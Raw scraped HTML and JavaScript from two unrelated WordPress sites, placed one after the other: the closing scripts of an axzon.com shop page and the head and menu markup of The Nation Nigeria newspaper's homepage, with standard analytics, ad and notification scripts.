$(".free_download_submit").click(function(e) {//Non-Ajax free download squeeze page button clicked if(!$(".t-and-c").is(':checked')){ $('.t_and_c_error').show(); e.preventDefault(); } }); }); }); </script> <script type="text/javascript"> jQuery.noConflict(); jQuery(document).ready(function($) { $(function() { var shipping_var_warning_class = $('.shipping_var_changed'); var shipping_var_warning_default_class = $('.shipping_var_changed_default'); shipping_var_warning_class.hide(); $('.shipping_variation').change(function(){ shipping_var_warning_default_class.hide(); shipping_var_warning_class.show(); }); var eStore_shipping_var_needs_update = false; if(shipping_var_warning_class.is(":visible")){eStore_shipping_var_needs_update = true;} else if(shipping_var_warning_default_class.is(":visible")){eStore_shipping_var_needs_update = true;} $(".eStore_paypal_checkout_button").click(function(e){//Check if shipping variation has been selected if(eStore_shipping_var_needs_update){ shipping_var_warning_class.css({'border':'1px solid red','padding':'5px'}); shipping_var_warning_default_class.css({'border':'1px solid red','padding':'5px'}); e.preventDefault(); } }); }); }); </script> <script type="text/javascript"> jQuery.noConflict(); jQuery(document).ready(function($) { $(function(){ var eStore_cart_item_qty = $('.eStore_cart_item_qty'); eStore_cart_item_qty.keypress(function(){ $('.eStore_qty_change_pinfo').show(); }); }); }); </script> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KRKV64G" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- BEGIN recaptcha, injected by plugin wp-recaptcha-integration --> <script type="text/javascript"> var recaptcha_widgets={}; function wp_recaptchaLoadCallback(){ try { grecaptcha; } catch(err){ return; } var e = document.querySelectorAll ? document.querySelectorAll('.g-recaptcha:not(.wpcf7-form-control)') : document.getElementsByClassName('g-recaptcha'), form_submits; for (var i=0;i<e.length;i++) { (function(el){ var wid; // check if captcha element is unrendered if ( ! el.childNodes.length) { wid = grecaptcha.render(el,{ 'sitekey':'6LchJFEUAAAAADF6gvdD3zZadaegNhqvVRN52LQv', 'theme':el.getAttribute('data-theme') || 'light' }); el.setAttribute('data-widget-id',wid); } else { wid = el.getAttribute('data-widget-id'); grecaptcha.reset(wid); } })(e[i]); } } // if jquery present re-render jquery/ajax loaded captcha elements if ( typeof jQuery !== 'undefined' ) jQuery(document).ajaxComplete( function(evt,xhr,set){ if( xhr.responseText && xhr.responseText.indexOf('6LchJFEUAAAAADF6gvdD3zZadaegNhqvVRN52LQv') !== -1) wp_recaptchaLoadCallback(); } ); </script><script src="https://www.google.com/recaptcha/api.js?onload=wp_recaptchaLoadCallback&#038;render=explicit" async defer></script> <!-- END recaptcha --> <link rel='stylesheet' property='stylesheet' id='rs-icon-set-fa-icon-css' href='https://axzon.com/wp-content/plugins/revslider/public/assets/fonts/font-awesome/css/font-awesome.css' type='text/css' media='all' /> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/axzon.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7_redirect_forms = {"9":{"page_id":"","external_url":"","use_external_url":"","open_in_new_tab":"","http_build_query":"","http_build_query_selectively":"","http_build_query_selectively_fields":"","after_sent_script":"","thankyou_page_url":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://axzon.com/wp-content/plugins/wpcf7-redirect/js/wpcf7-redirect-script.js'></script> <script type='text/javascript' src='https://axzon.com/wp-content/themes/u-design/inc/frontend/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.6'></script> <script type='text/javascript'> /* <![CDATA[ */ var pretty_photo_custom_params = {"window_width_to_disable_pp":"0","pretty_photo_style_theme":"dark_rounded","disable_pretty_photo_gallery_overlay":null}; /* ]]> */ </script> <script type='text/javascript' src='https://axzon.com/wp-content/themes/u-design/inc/frontend/prettyPhoto/custom_params.js?ver=3.1.6'></script> <script type='text/javascript' src='https://axzon.com/wp-content/themes/u-design/inc/frontend/superfish-menu/js/superfish.combined.js?ver=1.7.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var udesign_script_vars = {"search_widget_placeholder":"Type here to search","disable_smooth_scrolling_on_pages":null,"remove_fixed_menu_on_mobile":null}; /* ]]> */ </script> <script type='text/javascript' src='https://axzon.com/wp-content/themes/u-design/assets/js/frontend/script.js?ver=1.0'></script> <script type='text/javascript' src='https://axzon.com/wp-content/themes/u-design/inc/frontend/meanmenu/jquery.meanmenu.min.js?ver=2.0.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var udesign_responsive_menu_2_vars = {"menu_2_screen_width":"959"}; /* ]]> */ </script> <script type='text/javascript' src='https://axzon.com/wp-content/themes/u-design/inc/frontend/meanmenu/jquery.meanmenu.options.js?ver=2.0.8'></script> <script type='text/javascript' src='https://axzon.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> </body> </html>
0
<!doctype html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en-US"> <![endif]--> <!--[if IE 9]> <html class="no-js lt-ie10" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name='viewport' content='width=device-width, initial-scale=1, user-scalable=yes' /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <link rel="pingback" href="https://thenationonlineng.net/xmlrpc.php" /> <title>The Nation Newspaper Nigeria - Latest Nigeria news update</title> <script type="text/javascript"> var jnews_ajax_url = 'https://thenationonlineng.net/?ajax-request=jnews'; </script> <meta name="description" content="The Nation Newspaper brings you latest Nigerian News Update. Our news ranges from; Nigeria news, politics, business, fashion, entertainment, Sports &amp; others" /> <link rel="canonical" href="https://thenationonlineng.net/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="The Nation Newspaper Nigeria - Latest Nigeria news update" /> <meta property="og:description" content="The Nation Newspaper brings you latest Nigerian News Update. Our news ranges from; Nigeria news, politics, business, fashion, entertainment, Sports &amp; others" /> <meta property="og:url" content="https://thenationonlineng.net/" /> <meta property="og:site_name" content="The Nation Newspaper" /> <meta property="fb:app_id" content="124339121242023" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="The Nation Newspaper brings you latest Nigerian News Update. Our news ranges from; Nigeria news, politics, business, fashion, entertainment, Sports &amp; others" /> <meta name="twitter:title" content="The Nation Newspaper Nigeria - Latest Nigeria news update" /> <meta name="twitter:site" content="@thenationnews" /> <meta name="twitter:image" content="https://thenationonlineng.net/wp-content/uploads/2019/04/default-img-big.png" /> <meta name="twitter:creator" content="@thenationnews" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://thenationonlineng.net/#organization","name":"","url":"https://thenationonlineng.net/","sameAs":["https://www.facebook.com/thenationng","https://twitter.com/thenationnews"],"logo":{"@type":"ImageObject","@id":"https://thenationonlineng.net/#logo","url":"https://thenationonlineng.net/wp-content/uploads/2018/06/MASHEAD1.jpg","width":256,"height":306,"caption":"The Nation"},"image":{"@id":"https://thenationonlineng.net/#logo"}},{"@type":"WebSite","@id":"https://thenationonlineng.net/#website","url":"https://thenationonlineng.net/","name":"The Nation Newspaper","publisher":{"@id":"https://thenationonlineng.net/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://thenationonlineng.net/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://thenationonlineng.net/#webpage","url":"https://thenationonlineng.net/","inLanguage":"en-US","name":"The Nation Newspaper Nigeria - Latest Nigeria news update","isPartOf":{"@id":"https://thenationonlineng.net/#website"},"about":{"@id":"https://thenationonlineng.net/#organization"},"datePublished":"2018-09-03T04:53:49+00:00","dateModified":"2019-05-15T05:56:01+00:00","description":"The Nation Newspaper brings you latest Nigerian News Update. Our news ranges from; Nigeria news, politics, business, fashion, entertainment, Sports & others"}]}</script> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Nation Newspaper &raquo; Feed" href="https://thenationonlineng.net/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Nation Newspaper &raquo; Comments Feed" href="https://thenationonlineng.net/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/thenationonlineng.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://thenationonlineng.net/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.7' type='text/css' media='all' /> <link rel='stylesheet' id='addtoany-css' href='https://thenationonlineng.net/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.15' type='text/css' media='all' /> <style id='addtoany-inline-css' type='text/css'> body.page .a2a_floating_style.a2a_vertical_style { display: none; } body.archive .a2a_floating_style.a2a_vertical_style { display: none; } </style> <link rel='stylesheet' id='mediaelement-css' href='https://thenationonlineng.net/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://thenationonlineng.net/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jnews-frontend-css' href='https://thenationonlineng.net/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=4.0.7' type='text/css' media='all' /> <link rel='stylesheet' id='jnews-style-css' href='https://thenationonlineng.net/wp-content/themes/jnews/style.css?ver=4.0.7' type='text/css' media='all' /> <link rel='stylesheet' id='jeg-dynamic-style-css' href='https://thenationonlineng.net/wp-content/uploads/jeg/jeg-2wWk7iMtTj.css?ver=1.0.0' type='text/css' media='all' /> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <link rel='https://api.w.org/' href='https://thenationonlineng.net/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://thenationonlineng.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://thenationonlineng.net/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://thenationonlineng.net/' /> <link rel="alternate" type="application/json+oembed" href="https://thenationonlineng.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthenationonlineng.net%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://thenationonlineng.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthenationonlineng.net%2F&#038;format=xml" /> <script data-cfasync="false"> window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={}; (function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script"); </script> <script type="text/javascript"> _atrk_opts = { atrk_acct:"rC2Qe1aMYw00MJ", domain:"thenationonlineng.net",dynamic: true}; (function() { var as = document.createElement('script'); as.type = 'text/javascript'; as.async = true; as.src = "https://d31qbv1cthcecs.cloudfront.net/atrk.js"; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(as, s); })(); </script> <noscript><img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=rC2Qe1aMYw00MJ" style="display:none" height="1" width="1" alt="" /></noscript> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress." /> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://thenationonlineng.net/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script> <script> window.OneSignal = window.OneSignal || []; OneSignal.push( function() { OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php"; OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php"; OneSignal.SERVICE_WORKER_PARAM = { scope: '/' }; OneSignal.setDefaultNotificationUrl("https://thenationonlineng.net"); var oneSignal_options = {}; window._oneSignalInitOptions = oneSignal_options; oneSignal_options['wordpress'] = true; oneSignal_options['appId'] = '5dfa6c9a-f1a9-4345-b4a0-ae584da41612'; oneSignal_options['autoRegister'] = true; oneSignal_options['welcomeNotification'] = { }; oneSignal_options['welcomeNotification']['title'] = ""; oneSignal_options['welcomeNotification']['message'] = ""; oneSignal_options['subdomainName'] = "TheNationNigeria"; oneSignal_options['promptOptions'] = { }; oneSignal_options['notifyButton'] = { }; oneSignal_options['notifyButton']['enable'] = true; oneSignal_options['notifyButton']['position'] = 'bottom-right'; oneSignal_options['notifyButton']['theme'] = 'default'; oneSignal_options['notifyButton']['size'] = 'medium'; oneSignal_options['notifyButton']['prenotify'] = true; oneSignal_options['notifyButton']['showCredit'] = true; oneSignal_options['notifyButton']['text'] = {}; OneSignal.init(window._oneSignalInitOptions); }); function documentInitOneSignal() { var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt"); var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); }; for(var i = 0; i < oneSignal_elements.length; i++) oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false); } if (document.readyState === 'complete') { documentInitOneSignal(); } else { window.addEventListener("load", function(event){ documentInitOneSignal(); }); } </script> <link rel="icon" href="https://thenationonlineng.net/wp-content/uploads/2017/05/cropped-Logo-32x32.jpg" sizes="32x32" /> <link rel="icon" href="https://thenationonlineng.net/wp-content/uploads/2017/05/cropped-Logo-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://thenationonlineng.net/wp-content/uploads/2017/05/cropped-Logo-180x180.jpg" /> <meta name="msapplication-TileImage" content="https://thenationonlineng.net/wp-content/uploads/2017/05/cropped-Logo-270x270.jpg" /> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-5089981496810613", enable_page_level_ads: true }); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-9422806-1', 'thenationonlineng.net'); ga('send', 'pageview'); (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-5089981496810613", enable_page_level_ads: true }); </script> <style type="text/css" id="wp-custom-css"> .jeg_main_menu>li>a{font-size:12px !important;} .jeg_block_heading{ margin-bottom:10px; } .jeg_tabpost_content{ padding-top:10px; } .jeg_thumb .jeg_post_category{ display:none; } p{ text-align:justify; } .col-sm-8, .col-md-8 { background: #fff; padding:15px; } .widget { margin-bottom: 40px; background: #fff; padding: 10px; } .jnews_category_header_bottom{ display:none; } .wpb_wrapper { background: #fff; padding: 5px; } .wpb_wrapper.no-back{ background:none; } .jeg_slide_caption .jeg_post_meta{ display:none; } .belowads{ border-bottom:1px solid #ccc; margin-bottom:5px; } .jeg_postbig .jeg_postblock_content .jeg_post_meta, .jeg_postblock_content .jeg_post_meta .jeg_meta_author{ display:none; } </style> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1535354015743{margin-top: 5px !important;}.vc_custom_1483584986908{margin-bottom: 40px !important;padding-top: 40px !important;background-color: #212121 !important;}.vc_custom_1557558497984{padding-right: -15px !important;padding-left: -15px !important;}.vc_custom_1557839518540{padding-right: 10px !important;padding-left: 10px !important;background-color: #ffffff !important;}.vc_custom_1557411585844{background-color: #ffffff !important;}.vc_custom_1551167997535{padding-right: 10px !important;padding-left: 10px !important;background-color: #ffffff !important;}.vc_custom_1554706607106{background-color: #ffffff !important;}.vc_custom_1554706624525{background-color: #ffffff !important;}.vc_custom_1535119933649{padding-right: 0px !important;padding-left: 0px !important;background-color: #d3d3d3 !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head> <body class="home page-template page-template-template-builder page-template-template-builder-php page page-id-915165 jnews jsc_normal wpb-js-composer js-comp-ver-5.7 vc_responsive"> <div class="jeg_ad jeg_ad_top jnews_header_top_ads"> <div class='ads-wrapper '><div class='ads_code'><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5089981496810613" data-ad-slot="4727903770" data-ad-format="auto"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div> </div> <div class="jeg_viewport"> <div class="jeg_header_wrapper"> <div class="jeg_header_instagram_wrapper"> </div> <div class="jeg_header full"> <div class="jeg_midbar jeg_container dark"> <div class="container"> <div class="jeg_nav_row"> <div class="jeg_nav_col jeg_nav_left jeg_nav_normal"> <div class="item_wrap jeg_nav_alignleft"> <div class="jeg_nav_item jeg_logo jeg_desktop_logo"> <h1 class="site-title"> <a href="https://thenationonlineng.net/" style="padding: 0 0 0 0;"> <img src="https://thenationonlineng.net/wp-content/uploads/2019/04/trans-tn.fw_.fw_-1.png" srcset="https://thenationonlineng.net/wp-content/uploads/2019/04/trans-tn.fw_.fw_-1.png 1x, https://thenationonlineng.net/wp-content/uploads/2019/04/trans-tn.fw_.fw_-1.png 2x" alt=""> </a> </h1> </div> </div> </div> <div class="jeg_nav_col jeg_nav_center jeg_nav_normal"> <div class="item_wrap jeg_nav_aligncenter"> </div> </div> <div class="jeg_nav_col jeg_nav_right jeg_nav_grow"> <div class="item_wrap jeg_nav_alignright"> <div class="jeg_nav_item"> <ul class="jeg_menu jeg_top_menu"><li id="menu-item-997067" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-997067"><a href="https://thenationonlineng.net/about-us/">About us</a></li> <li id="menu-item-997068" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-997068"><a href="https://thenationonlineng.net/advert-rates/">Advert Rates</a></li> </ul></div><div class="jeg_separator separator1"></div><div class="jeg_nav_item socials_widget jeg_social_icon_block nobg"> <a href="https://www.facebook.com/thenationng/" target='_blank' class="jeg_facebook"><i class="fa fa-facebook"></i> </a><a href="https://twitter.com/TheNationNews" target='_blank' class="jeg_twitter"><i class="fa fa-twitter"></i> </a><a href="https://www.instagram.com/thenationnewspaper/" target='_blank' class="jeg_instagram"><i class="fa fa-instagram"></i> </a></div> <div class="jeg_nav_item jeg_search_wrapper search_icon jeg_search_popup_expand"> <a href="#" class="jeg_search_toggle"><i class="fa fa-search"></i></a> <form action="https://thenationonlineng.net/" method="get" class="jeg_search_form" target="_top"> <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off"> <button type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button> </form> <div class="jeg_search_result jeg_search_hide with_result"> <div class="search-result-wrapper"> </div> <div class="search-link search-noresult"> No Result </div> <div class="search-link search-all-button"> <i class="fa fa-search"></i> View All Result </div> </div></div><div class="jeg_nav_item jeg_top_date"> Thursday, May 16, 2019</div><div class="jnews_header_topbar_weather"> </div> </div> </div> </div> </div> </div><div class="jeg_bottombar jeg_navbar jeg_container jeg_navbar_wrapper jeg_navbar_normal jeg_navbar_dark"> <div class="container"> <div class="jeg_nav_row"> <div class="jeg_nav_col jeg_nav_left jeg_nav_grow"> <div class="item_wrap jeg_nav_alignleft"> <div class="jeg_nav_item jeg_nav_icon"> <a href="#" class="toggle_btn jeg_mobile_toggle"> <span></span><span></span><span></span> </a> </div><div class="jeg_main_menu_wrapper"> <div class="jeg_nav_item jeg_mainmenu_wrap"><ul class="jeg_menu jeg_main_menu jeg_menu_style_1" data-animation="animate"><li id="menu-item-919890" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-919890 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/">Home</a></li> <li id="menu-item-124" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-124 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/news/">News</a></li> <li id="menu-item-126" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/politics/">Politics</a></li> <li id="menu-item-652781" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652781 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/">Columnists</a> <ul class="sub-menu"> <li id="menu-item-652784" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652784 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/monday/">Monday</a> <ul class="sub-menu"> <li id="menu-item-652795" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652795 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sam-omatseye/">Sam Omatseye</a></li> <li id="menu-item-652793" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652793 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/emeka-omeihe/">Emeka Omeihe</a></li> <li id="menu-item-652794" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652794 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/monday/femi-macaulay/">Femi Macaulay</a></li> </ul> </li> <li id="menu-item-652788" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652788 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/tuesday/">Tuesday</a> <ul class="sub-menu"> <li id="menu-item-919509" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-919509 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/gabriel-amalu/">Gabriel Amalu</a></li> <li id="menu-item-652802" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652802 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/olatunji-dare/">Olatunji Dare</a></li> <li id="menu-item-652801" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652801 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/olakunle-abimbola/">Olakunle Abimbola</a></li> <li id="menu-item-652803" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652803 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/sanya-oni/">Sanya Oni</a></li> </ul> </li> <li id="menu-item-652789" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-652789 bgnav" data-item-row="default"><a href="https://thenationonlineng.net/category/columnists/wednesday/">Wednesday</a> <ul class="sub-menu"> <li id="menu-item-652830" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-652830 bgnav" 